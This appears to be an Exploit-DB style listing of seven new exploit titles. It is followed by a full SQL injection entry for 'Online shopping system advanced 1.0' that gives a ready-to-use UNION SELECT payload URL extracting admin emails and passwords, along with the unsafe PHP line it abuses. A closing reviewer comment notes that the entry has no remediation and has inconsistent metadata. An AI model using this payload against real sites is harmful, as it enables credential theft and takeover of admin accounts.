
7 changes to exploits/shellcodes

Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
Netis E1+ 1.2.32533 - Backdoor Account (root)
Online shopping system advanced 1.0 - 'p' SQL Injection
Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak
Online Course Registration 2.0 - Authentication Bypass
Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
# Exploit Author : Majid kalantari
# Date: 2020-04-26
# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Version: -
# Tested on: Windows 10
# CVE: N/A
===============================================
# vulnerable file: product.php
# vulnerable parameter : p
# payload :
http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
!
#Description: ($product_id input is not safe)
Line 46:
$product_id = $_GET['p'];
$sql = " SELECT * FROM products ";
$sql = " SELECT * FROM products WHERE product_id = $product_id";
=============================================== |
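
Review bot: the description under "Line 46" shows `$_GET['p']` interpolated unquoted into `WHERE product_id = $product_id` but stops there with no remediation, so a reader maintaining this application gets the finding without the fix. Add a line stating that `p` should be validated as an integer and bound through a prepared statement rather than concatenated into the query. The metadata also needs a pass: `# Version: -` contradicts the 1.0 in the title, the payload URL ends in `%23#` followed by a stray `!` line, and `$sql` is assigned twice with the first assignment immediately overwritten, which reads like a paste error and makes it unclear which statements actually sit at line 46 of product.php.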